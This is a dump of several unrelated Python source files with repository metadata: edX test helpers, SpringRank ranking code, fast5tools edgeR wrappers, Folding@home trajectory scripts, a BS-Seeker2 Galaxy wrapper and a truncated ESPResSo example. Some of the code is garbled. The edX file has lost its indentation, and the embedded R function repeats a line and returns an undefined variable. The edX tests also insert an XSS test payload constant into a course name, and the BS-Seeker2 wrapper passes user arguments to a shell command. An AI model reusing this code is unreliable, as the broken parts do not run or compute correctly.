os.environ.get('BOK_CHOY_HOSTNAME', '127.0.0.1'),
os.environ.get('BOK_CHOY_CMS_PORT', 8031),
))
logs = self.browser.execute_script("return window.localStorage.getItem('console_log_capture');")
if not logs:
return
logs = json.loads(logs)
log_dir = path('test_root') / 'log'
        if 'SHARD' in os.environ:
log_dir /= "shard_{}".format(os.environ["SHARD"])
log_dir.mkdir_p()
with (log_dir / '{}.browser.log'.format(self.id()[:60])).open('w') as browser_log:
for (message, url, line_no, col_no, stack) in logs:
browser_log.write(u"{}:{}:{}: {}\n {}\n".format(
url,
line_no,
col_no,
message,
(stack or "").replace('\n', '\n ')
))
super(AcceptanceTest, self).tearDown()
class UniqueCourseTest(AcceptanceTest):
"""
Test that provides a unique course ID.
"""
def setUp(self):
super(UniqueCourseTest, self).setUp()
self.course_info = {
'org': 'test_org',
'number': self.unique_id,
'run': 'test_run',
'display_name': 'Test Course' + XSS_INJECTION + self.unique_id
}
@property
def course_id(self):
"""
Returns the serialized course_key for the test
"""
# TODO - is there a better way to make this agnostic to the underlying default module store?
default_store = os.environ.get('DEFAULT_STORE', 'draft')
course_key = CourseLocator(
self.course_info['org'],
self.course_info['number'],
self.course_info['run'],
deprecated=(default_store == 'draft')
)
return unicode(course_key)
class YouTubeConfigError(Exception):
"""
Error occurred while configuring YouTube Stub Server.
"""
pass
class YouTubeStubConfig(object):
"""
Configure YouTube Stub Server.
"""
YOUTUBE_HOSTNAME = os.environ.get('BOK_CHOY_HOSTNAME', '127.0.0.1')
PORT = 9080
URL = 'http://{}:{}/'.format(YOUTUBE_HOSTNAME, PORT)
@classmethod
def configure(cls, config):
"""
Allow callers to configure the stub server using the /set_config URL.
Arguments:
config (dict): Configuration dictionary.
Raises:
YouTubeConfigError
"""
youtube_stub_config_url = cls.URL + 'set_config'
config_data = {param: json.dumps(value) for param, value in config.items()}
response = requests.put(youtube_stub_config_url, data=config_data)
if not response.ok:
raise YouTubeConfigError(
'YouTube Server Configuration Failed. URL {0}, Configuration Data: {1}, Status was {2}'.format(
youtube_stub_config_url, config, response.status_code))
@classmethod
def reset(cls):
"""
Reset YouTube Stub Server Configurations using the /del_config URL.
Raises:
YouTubeConfigError
"""
youtube_stub_config_url = cls.URL + 'del_config'
response = requests.delete(youtube_stub_config_url)
if not response.ok:
raise YouTubeConfigError(
'YouTube Server Configuration Failed. URL: {0} Status was {1}'.format(
youtube_stub_config_url, response.status_code))
@classmethod
def get_configuration(cls):
"""
Allow callers to get current stub server configuration.
Returns:
dict
"""
youtube_stub_config_url = cls.URL + 'get_config'
response = requests.get(youtube_stub_config_url)
if response.ok:
return json.loads(response.content)
else:
return {}
def click_and_wait_for_window(page, element):
"""
To avoid a race condition, click an element that launces a new window, and
wait for that window to launch.
To check this, make sure the number of window_handles increases by one.
Arguments:
page (PageObject): Page object to perform method on
element (WebElement): Clickable element that triggers the new window to open
"""
num_windows = len(page.browser.window_handles)
element.click()
WebDriverWait(page.browser, 10).until(
lambda driver: len(driver.window_handles) > num_windows
)
def create_user_partition_json(partition_id, name, description, groups, scheme="random"):
"""
Helper method to create user partition JSON. If scheme is not supplied, "random" is used.
"""
# All that is persisted about a scheme is its name.
class MockScheme(object):
name = scheme
return UserPartition(
partition_id, name, description, groups, MockScheme()
).to_json()
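# Example (a sketch, assuming Group from xmodule.partitions.partitions):
#   create_user_partition_json(0, 'AB Test', 'Experiment groups',
#                              [Group(0, 'A'), Group(1, 'B')])
# returns a JSON-serializable dict for a partition using the 'random' scheme.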
def assert_nav_help_link(test, page, href, signed_in=True, close_window=True):
"""
Asserts that help link in navigation bar is correct.
It first checks the url inside anchor DOM element and
then clicks to ensure that help opens correctly.
Arguments:
test (AcceptanceTest): Test object
page (PageObject): Page object to perform tests on.
href (str): The help link which we expect to see when it is opened.
signed_in (bool): Specifies whether user is logged in or not. (It affects the css)
close_window(bool): Close the newly-opened help window before continuing
"""
expected_link = {
'href': href,
'text': 'Help'
}
# Get actual anchor help element from the page.
actual_link = page.get_nav_help_element_and_click_help(signed_in)
# Assert that 'href' and text are the same as expected.
assert_link(test, expected_link, actual_link)
# Assert that opened link is correct
assert_opened_help_link_is_correct(test, href)
# Close the help window if not kept open intentionally
if close_window:
close_help_window(page)
def assert_side_bar_help_link(test, page, href, help_text, as_list_item=False, index=-1, close_window=True):
"""
Asserts that help link in side bar is correct.
It first checks the url inside anchor DOM element and
then clicks to ensure that help opens correctly.
Arguments:
test (AcceptanceTest): Test object
page (PageObject): Page object to perform tests on.
href (str): The help link which we expect to see when it is opened.
as_list_item (bool): Specifies whether help element is in one of the
'li' inside a sidebar list DOM element.
index (int): The index of element in case there are more than
one matching elements.
close_window(bool): Close the newly-opened help window before continuing
"""
expected_link = {
'href': href,
'text': help_text
}
# Get actual anchor help element from the page.
actual_link = page.get_side_bar_help_element_and_click_help(as_list_item=as_list_item, index=index)
# Assert that 'href' and text are the same as expected.
assert_link(test, expected_link, actual_link)
# Assert that opened link is correct
assert_opened_help_link_is_correct(test, href)
# Close the help window if not kept open intentionally
if close_window:
close_help_window(page)
def close_help_window(page):
"""
Closes the help window
Args:
page (PageObject): Page object to perform tests on.
"""
browser_url = page.browser.current_url
if browser_url.startswith('https://edx.readthedocs.io') or browser_url.startswith('http://edx.readthedocs.io'):
page.browser.close() # close only the current window
page.browser.switch_to_window(page.browser.window_handles[0])
class TestWithSearchIndexMixin(object):
""" Mixin encapsulating search index creation """
TEST_INDEX_FILENAME = "test_root/index_file.dat"
def _create_search_index(self):
""" Creates search index backing file """
with open(self.TEST_INDEX_FILENAME, "w+") as index_file:
json.dump({}, index_file)
def _cleanup_index_file(self):
""" Removes search index backing file """
remove_file(self.TEST_INDEX_FILENAME)
|
gsehub/edx-platform
|
common/test/acceptance/tests/helpers.py
|
Python
|
agpl-3.0
| 36,453
|
[
"VisIt"
] |
378f9f7945610befb28c8365bb97e8a97481445f90fc68602f4db04fce3f27e4
|
import networkx as nx
import numpy as np
import scipy.sparse
import scipy.sparse.linalg
def SpringRank(A,alpha=0.,l0=1.0,l1=1.0):
"""
Main routine to calculate SpringRank by solving linear system
Default parameters are initialized as in the standard SpringRank model
INPUT:
A=network adjacency matrix (can be weighted)
alpha: controls the impact of the regularization term
l0: regularization spring's rest length
l1: interaction springs' rest length
OUTPUT:
    rank: N-dim array; the i-th entry is the rank of node i, indexed as in the adjacency matrix A
"""
N=A.shape[0]
k_in=np.sum(A,0)
k_out=np.sum(A,1)
One=np.ones(N)
C= A+A.T
D1 = np.zeros(A.shape)
D2 = np.zeros(A.shape)
for i in range(A.shape[0]):
D1[i,i]=k_out[i,0]+k_in[0,i]
D2[i,i]=l1*(k_out[i,0]-k_in[0,i])
if alpha!=0.:
print('Using alpha!=0: matrix is invertible')
B=One*alpha*l0+np.dot(D2,One)
A=alpha*np.eye(N)+D1-C
A=scipy.sparse.csr_matrix(np.matrix(A))
try:
print('Trying scipy.sparse.linalg.spsolve(A,B)')
rank = scipy.sparse.linalg.spsolve(A,B)
# rank=np.linalg.solve(A,B)
return np.transpose(rank)
        except Exception:
print('Switched to scipy.sparse.linalg.bicgstab(A,B)[0]')
rank=scipy.sparse.linalg.bicgstab(A,B)[0]
return np.transpose(rank)
else:
print('Using faster computation: fixing a rank degree of freedom')
C= C+np.repeat(A[N-1,:][None],N,axis=0)+np.repeat(A[:,N-1].T[None],N,axis=0)
D3 = np.zeros(A.shape)
for i in range(A.shape[0]):D3[i,i]=l1*(k_out[N-1,0]-k_in[0,N-1])
B=np.dot(D2,One)+np.dot(D3,One)
# A=D1-C
A=scipy.sparse.csr_matrix(np.matrix(D1-C))
        try:
            print('Trying scipy.sparse.linalg.spsolve')
rank = scipy.sparse.linalg.spsolve(A,B)
# rank=np.linalg.solve(A,B) # cannot use it with sparse matrices
print(rank)
return np.transpose(rank)
        except Exception:
print('Switched to scipy.sparse.linalg.bicgstab(A,B)[0]')
rank=scipy.sparse.linalg.bicgstab(A,B)[0]
# rank=np.linalg.lstsq(A,B)[0]
return np.transpose(rank)
def SpringRank_planted_network(N,beta,alpha,K,prng,l0=0.5,l1=1.):
'''
    Uses the SpringRank generative model to build a directed, possibly weighted network that may contain self-loops.
Can be used to generate benchmarks for hierarchical networks
Steps:
1. Generates the scores (default is factorized Gaussian)
2. Extracts A_ij entries (network edges) from Poisson distribution with average related to SpringRank energy
INPUT:
N=# of nodes
beta= inverse temperature, controls noise
alpha=controls prior's variance
K=E/N --> average degree, controls sparsity
l0=prior spring's rest length
    l1=interaction spring's rest length
OUTPUT:
G: nx.DiGraph() Directed (possibly weighted graph, there can be self-loops)
'''
G=nx.DiGraph()
scores=prng.normal(l0,1./np.sqrt(alpha*beta),N) # planted scores ---> uses factorized Gaussian
for i in range(N):G.add_node(i,score=scores[i])
# ---- Fixing sparsity i.e. the average degree ----
Z=0.
for i in range(N):
for j in range(N):
Z+=np.exp(-0.5*beta*np.power(scores[i]-scores[j]-l1,2))
c=float(K*N)/Z
# --------------------------------------------------
# ---- Building the graph ------------------------
for i in range(N):
for j in range(N):
H_ij=0.5*np.power((scores[i]-scores[j]-l1),2)
lambda_ij=c*np.exp(-beta*H_ij)
A_ij=prng.poisson(lambda_ij,1)[0]
if A_ij>0:G.add_edge(i,j,weight=A_ij)
return G
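# Example usage (a sketch; note that SpringRank() indexes the adjacency matrix
# with two subscripts like k_out[i,0], so matrix-style input such as the output
# of nx.to_numpy_matrix is assumed):
#   prng = np.random.RandomState(42)
#   G = SpringRank_planted_network(N=50, beta=5., alpha=1., K=5, prng=prng)
#   A = nx.to_numpy_matrix(G)
#   ranks = SpringRank(A, alpha=0.)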
|
compsocialscience/summer-institute
|
2018/materials/boulder/day3-networks/SpringRank_tools.py
|
Python
|
mit
| 4,015
|
[
"Gaussian"
] |
4f729ea354aa1566d5ea41833dcdbaaf0c556f4c198c0f5578ed8b999acaa871
|
import sys
import numpy as np
from collections import defaultdict
from fast5tools.helperops import *
try:
Rless=False
has_R=True
import rpy2.robjects as robjects
from rpy2.robjects.packages import importr
##import rpy2.robjects.lib.ggplot2 as ggplot2
import rpy2.robjects.numpy2ri
rpy2.robjects.numpy2ri.activate()
from fast5tools.edgeRops import *
except:
Rless=True
has_R=False
sys.stderr.write('''
Analyses that use R cannot be performed.
Make sure to install:
- Download R at: https://www.r-project.org/
    - the ggplot2 library in R: install.packages('ggplot2')
- ggplot2 fast5tools plots have been discontinued, so you can safely ignore this.
- Install edgeR:
- See: https://bioconductor.org/packages/release/bioc/html/edgeR.html
source("https://bioconductor.org/biocLite.R")
biocLite("edgeR")
- the rpy2 package from terminal/cmdline: pip install rpy2
- Install all necessary R stuff before rpy2, which may complain about R/library versions.
Then try again.\n\n''')
## FUNCTIONS - some/many of these are no longer needed per se (the EdgeR class is the new approach)
if has_R:
def load_edgeR():
## Load EdgeR Library
robjects.r('''
library(edgeR, quietly = TRUE)
''')
def make_edgeR_function():
## Make EdgeR Function, "f"
robjects.r('''
f <- function(data, groups, genes, bcv){
y <- DGEList(counts=data, group=groups, genes=as.matrix(genes, ncol=1))
y <- calcNormFactors(y)
        y <- calcNormFactors(y)
return(et)
}
''')
## Return EdgeR Function:
return robjects.globalenv['f']
def get_edgeR_function():
load_edgeR()
return make_edgeR_function()
_get_DGE_list_ = get_edgeR_function()
def get_DGE_list(data, groups, genes, bcv):
return _get_DGE_list_(data, groups, genes, bcv)
## New approach
def get_edgeR_functions():
load_edgeR()
return robjects.r['DGEList'], robjects.r['calcNormFactors'], robjects.r['exactTest']
_DGEList, _calcNormFactors, _exactTest = get_edgeR_functions()
def DGEList(counts, group, genes):
'''counts is "data" in EdgeR class'''
# This worked y = _DGEList(counts=np.array([[1,2],[1,3],[1,4],[1,5]]), group=np.array([1,2]), genes=np.array(['a','b','c','d']))
return _DGEList(counts=counts, group=group, genes=genes)#
def calcNormFactors(dgelist):
return _calcNormFactors(dgelist)
def exactTest(normdgelist, bcv=False, dispersion=False):
''' dispersion is just bcv**2'''
if bcv is not False:
return _exactTest(normdgelist, dispersion=bcv**2)
elif dispersion is not False:
return _exactTest(normdgelist, dispersion=dispersion)
def get_tag_table(dgelist, n_genes):
''' dgelist from get_DGE_list()
n_genes is len(genes)'''
return robjects.r.topTags(dgelist, n=n_genes)[0]
def get_counts(kmercounts, refcounts):
'''Returns dict of dicts.
ref = condition1.
test = condition2.
'''
## read in and equilibrate the 2 kmer count tables
        kmerdict, refdict = readInTwoKmerTables(kmercounts, refcounts)
        ## add total counts to respective kmerdicts
        kmerdict["Total"] = totalKmerCount(kmerdict)
        refdict["Total"] = totalKmerCount(refdict)
## add kmdericts to defaultdict(dict) that has keys condition1 and condition2
counts = defaultdict(dict)
counts['condition1'] = dict(refdict)
counts['condition2'] = dict(kmerdict)
return dict(counts)
def get_conditions(counts):
''' Simply returns condition names - which are keys in counts dict.'''
return sorted(counts.keys())
def get_genes(counts, conditions=None):
''' Simply returns list of all unique kmers/genes found in the conditions to deal with 1 set.'''
if conditions is None:
conditions = get_conditions(counts)
all_genes = []
for condition in conditions:
all_genes.extend(counts[condition].keys())
return sorted(list(set(all_genes)))
def get_sizes(counts, conditions):
''' Simply returns total counts across all kmers/genes in each condition of counts dict.'''
if conditions is None:
conditions = get_conditions(counts)
        sizes = [counts[c]["Total"] for c in conditions]
assert len(sizes) == 2
return sizes
def get_conditions_and_genes(work_counts):
conditions = work_counts.keys()
conditions.sort()
all_genes = []
for c in conditions:
all_genes.extend(work_counts[c].keys())
all_genes = list(set(all_genes))
all_genes.sort()
sizes = [work_counts[c]["Total"] for c in conditions]
assert len(sizes) == 2
all_genes.remove("Total")
return conditions, all_genes, sizes
def edger_matrices(work_counts, conditions, all_genes, sizes):
"""Retrieve matrices for input into edgeR differential expression analysis.
"""
groups = [1, 2]
data = []
final_genes = []
for g in all_genes:
cur_row = [int(work_counts[c][g]) for c in conditions]
if sum(cur_row) > 0:
data.append(cur_row)
final_genes.append(g)
        return (np.array(data), np.array(groups), np.array(sizes),
                conditions, final_genes)
def run_kmer_diff(parser, args):
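        ## Legacy sketch kept for reference: make_count_dict and run_edger are
        ## not defined in this module, and edger_matrices (above) now expects
        ## four arguments.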
counts = make_count_dict(parser, args)
data, groups, sizes, conditions, genes = edger_matrices(counts)
probs = run_edger(data, groups, sizes, genes, args)
#### CLASSES
if has_R:
class EdgeR(object):
def __init__(self, testdict, refdict, bcv=None):
''' testdict,refdict are both default_dictionaries_int with kmer/gene keys and counts as values.'''
## read in and equilibrate the 2 kmer count tables
#self.testdict = testdict
#self.refdict = refdict
            rpy2.robjects.numpy2ri.activate() ## This needs to be deactivated before the iter_row() loop in _process_results
self.bcv = bcv
self.conditions = ['condition1', 'condition2']
self.groups = np.array([1,2])
#self.test_size = sum(testdict.values())
#self.ref_size = sum(refdict.values())
self.sizes = np.array([sum(refdict.values()), sum(testdict.values())])
self.counts = {'condition1':refdict, 'condition2':testdict}
self.all_genes = sorted(list(set(testdict.keys() + refdict.keys())))
self._define_data()
self._ensureEqualKmerSets()
self._debug_bcv=0.2
#self.dgelist = get_DGE_list(self.data, self.groups, self.final_genes, self._debug_bcv)
#self.tag_table = get_tag_table(self.dgelist, self.n_genes)
self.dgelist = DGEList(self.data, self.groups, np.array(self.final_genes))
self.dgelist = calcNormFactors(self.dgelist)
self._determine_bcv(bcv)
self.exactTest_results = exactTest(self.dgelist, dispersion=self.bcvsq)
self.tag_table = get_tag_table(self.exactTest_results, self.n_genes)
self.table_string = ''
self.results = defaultdict(list)
self._process_results()
self.medianNorm = None
def _define_data(self):
self.data = []
self.final_genes = []
for gene in self.all_genes:
curr_row = [int(self.counts[condition][gene]) for condition in self.conditions]
if sum(curr_row) > 0:
self.data.append(curr_row)
self.final_genes.append(gene)
self.data = np.array(self.data)
self.n_genes = len(self.final_genes)
def _ensureEqualKmerSets(self):
for key in self.final_genes:
self.counts['condition1'][key]
self.counts['condition2'][key]
def _determine_bcv(self, bcv=None):
if bcv is not None:
self.bcvsq = bcv**2
            ## Else, fall back to a default BCV of 0.2
else:
#self.bcvsq = "auto"
self.bcvsq = 0.2**2
## Could be set to a default value - e.g. 0.2
## Could be set to a diff value for each - e.g. a poisson-ish std given ref count, or std between conditions
## Could be set to other strings: "common", "trended", "tagwise"
def _process_results(self):
self.table_string = ''
rpy2.robjects.numpy2ri.deactivate()
for e in self.tag_table.iter_row():
out = ("\t").join(str(e).split("\n")[1].split())
## Add to table_string
self.table_string += out + '\n'
## Add elements to this class
x = out.split("\t")
self.results['k'].append(x[1])
self.results['logfc'].append(float(x[2]))
self.results['logcpm'].append(float(x[3]))
self.results['p'].append(float(x[4]))
self.results['fdr'].append(float(x[5]))
rpy2.robjects.numpy2ri.activate()
def get_countsdict(self):
return self.counts
def get_testdict(self):
return self.counts['condition2']
def get_refdict(self):
return self.counts['condition1']
def get_conditions(self):
return self.conditions
def get_groups(self):
            return self.groups
        def get_sizes(self):
            return self.sizes
def get_data(self):
return self.data
def get_genes(self):
assert self.final_genes == self.all_genes ## rm this line
return self.final_genes
def get_dge_list(self):
return self.dgelist
def get_norm_factors(self, condition=None):
if condition is None:
return self.dgelist[1][2]
else:
assert condition in [0,1]
return self.dgelist[1][2][condition]
def get_condition_sizes_from_dgelist(self):
return self.dgelist[1][1]
def get_dgelist_counts(self):
return self.dgelist[0]
def get_dge_list_genes(self):
return self.dgelist[2][0]
def get_normalized_counts(self):
return self.get_dgelist_counts() * self.get_norm_factors()
def get_average_normalized_counts_across_conditions(self):
return self.get_normalized_counts().mean(1)
def get_stdev_of_normalized_counts_across_conditions(self):
return self.get_normalized_counts().std(1, ddof=1)
def get_tag_table(self):
return self.tag_table
def get_table_string(self):
return self.table_string
def get_k_(self): #genes/names
return list(self.exactTest_results[2][0])
def get_k(self): #genes/names
return self.results['k']
#return list(self.exactTest_results[2][0])
def get_logfc(self):
return self.results['logfc']
def get_logcpm(self):
return self.results['logcpm']
def get_pvalues(self):
return self.results['p']
def get_fdr(self):
return self.results['fdr']
def __str__(self):
return self.get_table_string()
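# Example usage (a sketch; assumes R, edgeR and rpy2 are installed and that the
# kmer tables are defaultdict(int) counts as used elsewhere in fast5tools):
#   test = defaultdict(int, {'AAAA': 10, 'AAAC': 3})
#   ref = defaultdict(int, {'AAAA': 2, 'AAAC': 5})
#   e = EdgeR(test, ref, bcv=0.2)
#   print(e.get_table_string())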
|
JohnUrban/fast5tools
|
fast5tools/edgeRops.py
|
Python
|
mit
| 11,680
|
[
"Bioconductor"
] |
977852fb128c9ded10439242af6d64e5105fc03f75113422f27120e1a3a5e58b
|
import glob
import os
import mdtraj as md
import fah
def make_path(filename):
try:
path = os.path.split(filename)[0]
os.makedirs(path)
except OSError:
pass
def get_num_runs_clones(path):
"""Get the number of runs and clones.
Parameters
----------
path : str
Path to FAH data.
Returns
-------
n_runs : int
n_clones : int
Notes
-----
Assumes each run has the same number of clones.
"""
runs = glob.glob(os.path.join(path, "RUN*"))
n_runs = len(runs)
if n_runs == 0:
n_clones = 0
else:
clones = glob.glob(os.path.join(path, "RUN0", "CLONE*"))
n_clones = len(clones)
return n_runs, n_clones
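# Example (a sketch): for a project directory containing RUN0 and RUN1, each
# with CLONE0..CLONE9, get_num_runs_clones(path) returns (2, 10).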
def strip_water(path_to_merged_trajectories, output_path, min_num_frames=1):
"""Strip the water for a set of trajectories.
Parameters
----------
path_to_merged_trajectories : str
Path to merged HDF5 FAH trajectories
output_path : str
Path to put stripped trajectories
min_num_frames : int, optional, default=1
Skip if below this number.
Notes
-----
Assumes each run has the same number of clones.
"""
in_filenames = glob.glob(os.path.join(path_to_merged_trajectories, "*.h5"))
for in_filename in in_filenames:
t=md.load(in_filename)
topology=t.top.select('protein')
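        # despite its name, `topology` here is an array of protein atom
        # indices (from Topology.select), not a Topology object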
print("Stripping %s" % in_filename)
protein_filename = os.path.join(output_path, os.path.basename(in_filename))
fah.strip_water(in_filename, protein_filename, topology, min_num_frames=min_num_frames)
def merge_fah_trajectories(input_data_path, output_data_path, top_filename):
"""Strip the water for a set of trajectories.
Parameters
----------
input_data_path : str
Path to FAH Core17/Core18 data directory. E.g. XYZ/server2/data/SVRXYZ/PROJ10470/
output_data_path : str
Path to dump merged HDF5 files with concantenated trajectories.
Metadata for which files are processed are included INSIDE the HDF5
files.
top_filename : str,
filename of PDB containing the topology information, necessary
for loading the XTC files.
"""
n_runs, n_clones = get_num_runs_clones(input_data_path)
for run in range(n_runs):
top=md.load(top_filename % vars())
for clone in range(n_clones):
print(run, clone)
path = os.path.join(input_data_path, "RUN%d" % run, "CLONE%d" % clone)
out_filename = os.path.join(output_data_path, "run%d-clone%d.h5" % (run, clone))
print(path)
print(out_filename)
try:
fah.concatenate_core17(path, top, out_filename)
except RuntimeError:
print("Cannot munge RUN%d CLONE%d due to damaged XTC." % (run, clone))
continue
|
steven-albanese/FAHMunge
|
FAHMunge/automation.py
|
Python
|
lgpl-2.1
| 3,038
|
[
"MDTraj"
] |
63f62361075646143c311141302e42c2d5fc78c98be14fa662e1a0371dd0519c
|
import tempfile
__author__ = 'pf'
from subprocess import Popen
from collections import defaultdict
import sys, shutil, os, re
BUILD = 'build'
ALIGN = 'align'
CALL_METHYLATION = 'call_methylation'
EXEC = 'exec'
EXEC_PATH = EXEC+'-path'
ARG_TYPES = [BUILD, ALIGN, CALL_METHYLATION, EXEC]
USAGE = """
%(script)s is a wrapper script for bs_seeker2-build.py and bs_seeker2-align.py that is intended to be used with the Galaxy web platform.
The script takes command line parameters and runs bs_seeker2-align.py and bs_seeker2-build.py, if necessary.
The parameters that are related to bs_seeker2-build.py must be prefixed with --%(build_tag)s.
The parameters that are related to bs_seeker2-align.py must be prefixed with --%(align_tag)s.
Additionally, the path to BS-Seeker2 has to be specified via the --%(exec_path)s option.
For example:
python %(script)s --%(exec_path)s /mnt/Data/UCLA/Matteo/BS-Seeker --build-f data/arabidopsis/genome/Arabidopsis.fa --align-i data/arabidopsis/BS6_N1try2L7_seq.txt.fa --align-o data/arabidopsis/BS6_N1try2L7_seq.txt.fa.test_output
This will build the genome index for Arabidopsis.fa in a temporary directory. bs_seeker2-align.py will be run on the
newly created genome index. I.e. the following two commands will be run in a shell:
python /mnt/Data/UCLA/Matteo/BS-Seeker/bs_seeker2-build.py --db /tmp/tmpg8Eq1o -f /mnt/Data/UCLA/Matteo/bck_BS-Seeker/data/arabidopsis/genome/Arabidopsis.fa
python /mnt/Data/UCLA/Matteo/BS-Seeker/bs_seeker2-align.py --db /tmp/tmpg8Eq1o -o /mnt/Data/UCLA/Matteo/bck_BS-Seeker/data/arabidopsis/BS6_N1try2L7_seq.txt.fa.test_output -i /mnt/Data/UCLA/Matteo/bck_BS-Seeker/data/arabidopsis/BS6_N1try2L7_seq.txt.fa -g Arabidopsis.fa
The temporary directory will be deleted after the wrapper exits.
If no options related to bs_seeker2-build are passed, no genome index will be built and the corresponding pre-built genome index will be used
instead. No temporary files and directories will be created.
""" % { 'script' : os.path.split(__file__)[1], 'build_tag' :BUILD, 'align_tag' : ALIGN, 'exec_path' : EXEC_PATH }
def error(msg):
print >> sys.stderr, 'ERROR: %s' % msg
exit(1)
if __name__ == '__main__':
if len(sys.argv) == 1:
error('No parameters\n\n'+USAGE)
# Parse command line arguments
args = defaultdict(dict)
arg_key = None
arg_val = None
arg_type = None
for arg in sys.argv[1:]:
if arg.startswith('--'):
try:
arg_type, arg_key = re.match(r'--(\w+)(.*)', arg).groups()
if arg_type not in ARG_TYPES:
raise Exception("Bad argument: %s. arg_type (%s) must be one of: %s." % (arg, arg_type, ', '.join(ARG_TYPES)))
if not arg_key or arg_key[0] != '-':
raise Exception("Bad argument: %s. arg_key (%s) must start with - or --." % (arg, arg_key))
except Exception, e:
error(str(e) + '\n\n' + USAGE)
args[arg_type][arg_key] = ''
else:
args[arg_type][arg_key] = arg
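    # Example (a sketch): the arguments '--align-i reads.fa --align-o out'
    # are parsed into args == {'align': {'-i': 'reads.fa', '-o': 'out'}}.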
path_to_bs_seeker = args.get('exec', {'-path' : None})['-path'] # return None when exec not found
if path_to_bs_seeker is None:
error('You have to specify the path to BS-Seeker2 via --%s\n\n' % EXEC_PATH + USAGE)
tempdir = None
def run_prog(prog, params):
cwd, _ = os.path.split(__file__)
cmd = 'python %(prog)s %(params)s' % {
'prog' : os.path.join(cwd, prog),
'params' : ' '.join('%s %s' % (arg_key, arg_val) for arg_key, arg_val in params.items())
}
print 'exec:', cmd
return_code = Popen(args = cmd, shell = True).wait()
if return_code:
if tempdir:
shutil.rmtree(tempdir)
error("%s exit with error code %d" % (prog, return_code))
tempdir = tempfile.mkdtemp()
# bs_seeker2-build
if BUILD in args:
args[BUILD]['--db'] = tempdir
args[ALIGN]['--db'] = tempdir
run_prog(os.path.join(path_to_bs_seeker, 'bs_seeker2-build.py'), args[BUILD])
# bs_seeker2-align
args[ALIGN]['--temp_dir'] = tempdir
run_prog(os.path.join(path_to_bs_seeker, 'bs_seeker2-align.py'), args[ALIGN])
def getopt(h, k1, k2, default):
return h.get(k1, h.get(k2, default))
# bs_seeker2-call_methylation
args[CALL_METHYLATION].update({ '-i' : args[ALIGN]['--output'],
'--db' : os.path.join(args[ALIGN]['--db'],
os.path.split( getopt(args[ALIGN],'-g', '--genome', None))[1] +
('_rrbs_%s_%s' % (getopt(args[ALIGN], '-l', '--low', '40'),
getopt(args[ALIGN], '-u', '--up', '500'))
if len(set(['-r', '--rrbs']) & set(args[ALIGN])) > 0 else '') +
'_' + args[ALIGN]['--aligner'])
})
run_prog(os.path.join(path_to_bs_seeker, 'bs_seeker2-call_methylation.py'), args[CALL_METHYLATION])
if tempdir:
shutil.rmtree(tempdir)
|
BSSeeker/BSseeker2
|
galaxy/bs_seeker2_wrapper.py
|
Python
|
mit
| 5,196
|
[
"Galaxy"
] |
5090ed92fc365092bb5c5f638f73b1b919907d772803d29c5f6e2027752ab9f3
|
from __future__ import unicode_literals
from enum import Enum
from django.db import models
from django.contrib.auth.models import User
class DataType(Enum):
"""
Enumeration of valid file types
"""
NETCDF = 1
TEXT = 2
JSON = 3
NAMELIST = 4
IMAGE = 5
XML = 6
class BaseModel(models.Model):
"""
A simple base model to subclass from when we want to keep track of create and modify dates
"""
    created_date = models.DateTimeField(auto_now_add=True)
    modified_date = models.DateTimeField(auto_now=True)
class Meta:
"""
Declare this class abstract
"""
abstract = True
ordering = ["created_date"]
class DataFile(BaseModel):
"""
Model of data stored by the users
Inherit date fields from BaseModel
"""
path = models.CharField(max_length=255)
display_name = models.CharField(max_length=255)
owner = models.ForeignKey(User, related_name='data_owner_user')
allowed_access = models.ManyToManyField(User, related_name='file_allowed_access_users')
data_type = models.IntegerField(DataType)
def toDict(self):
"""
Dump contents to dict
"""
return {
'id': self.id,
'path': self.path,
'display_name': self.display_name,
'owner': self.owner.username,
'allowed_access': [user.username for user in self.allowed_access.all()],
'data_type': self.data_type
}
class DataSet(BaseModel):
"""
A container for data files, to group them into sets of data
"""
name = models.CharField(max_length=255)
allowed_access = models.ManyToManyField(User, related_name='data_set_allowed_access_users')
file_list = models.ManyToManyField(DataFile, related_name='data_set_contents')
metadata = models.CharField(max_length=1023)
owner = models.ForeignKey(User, related_name='dataset_owner')
def toDict(self):
"""
Dump contents to a dict
"""
return {
'id': self.id,
'name': self.name,
'metadata': self.metadata,
'allowed_access': [user.username for user in self.allowed_access.all()],
'file_list': [file.display_name for file in self.file_list.all()],
'owner': str(self.owner)
}
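# Usage sketch (illustrative only, not part of the original module; assumes a
# saved User instance named `owner` and that data_type stores DataType values
# as plain ints):
#
#   nc_file = DataFile.objects.create(
#       path='/data/run1.nc', display_name='run1',
#       owner=owner, data_type=DataType.NETCDF.value)
#   dataset = DataSet.objects.create(name='run1 set', metadata='{}',
#                                    owner=owner)
#   dataset.file_list.add(nc_file)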
|
sterlingbaldwin/acme_workbench
|
workbench-backend/file_manager/models.py
|
Python
|
bsd-2-clause
| 2,346
|
[
"NetCDF"
] |
568ea9b0b325cd0d9fe32b22e19472eea7e220ab9981902c4fdffa8cf5733f47
|
# Copyright (C) 2010-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Measure mean square displacements using the Observables/Correlators framework.
"""
import numpy as np
import espressomd
import espressomd.observables
import espressomd.accumulators
# System setup
system = espressomd.System(box_l=[1.0, 1.0, 1.0])
system.set_random_state_PRNG()
#system.seed = system.cell_system.get_state()['n_nodes'] * [1234]
np.random.seed(seed=system.seed)
system.part.add(pos=(0, 0, 0), v=(1, 2, 3))
system.time_step = 0.01
system.cell_system.skin = 0
system.cell_system.set_n_square(use_verlet_lists=False)
system.thermostat.set_langevin(kT=1, gamma=10, seed=42)
system.integrator.run(1000)
# Initialize observable for a particle with id 0
p = espressomd.observables.ParticlePositions(ids=(0,))
# Ask the observable for its parameters
print(p.get_params())
# Calculate and return current value
print(p.calculate())
# Calling calculate() again simply recomputes the current value
print(p.calculate())
# Instantiate a correlator correlating the p observable with itself,
# calculating the mean squared displacement (msd).
c = espressomd.accumulators.Correlator(
tau_lin=16, tau_max=1000, delta_N=1, obs1=p,
corr_operation="square_distance_componentwise", compress1="discard1")
# Instantiate a correlator calculating the FCS autocorrelation function from
# particle positions, using the symmetric focal spot with wx=wy=wz=10
# (sigma)
fcs = espressomd.accumulators.Correlator(
tau_lin=16, tau_max=10000, delta_N=10, obs1=p,
